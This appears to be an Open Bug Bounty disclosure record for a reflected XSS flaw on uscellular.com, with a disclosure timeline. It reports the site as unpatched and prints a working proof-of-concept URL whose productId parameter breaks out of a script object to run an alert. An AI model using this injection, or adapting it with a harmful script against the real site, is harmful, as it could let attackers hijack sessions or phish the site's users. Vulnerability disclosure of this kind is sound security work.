uscellular.com XSS vulnerability

2016-08-29T11:47:00
ID OBB:178699
Type openbugbounty
Reporter tbm
Modified 2017-02-16T05:14:00

Description

Vulnerable URL:
https://www.uscellular.com/devices/phones/BlackBerry-curve-9350.html?productId=prod260048_9185"}};alert`OPENBUGBOUNTY`;a%3D{id:"
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 21363
VIP website status:| Yes
Check uscellular.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 29 August, 2016 11:47 GMT
Vulnerability existence verified and confirmed| 1 September, 2016 04:30 GMT
Notification sent to subscribers (without technical details)| 1 September, 2016 06:17 GMT
Vulnerability details disclosed by researcher| 16 February, 2017 05:14 GMT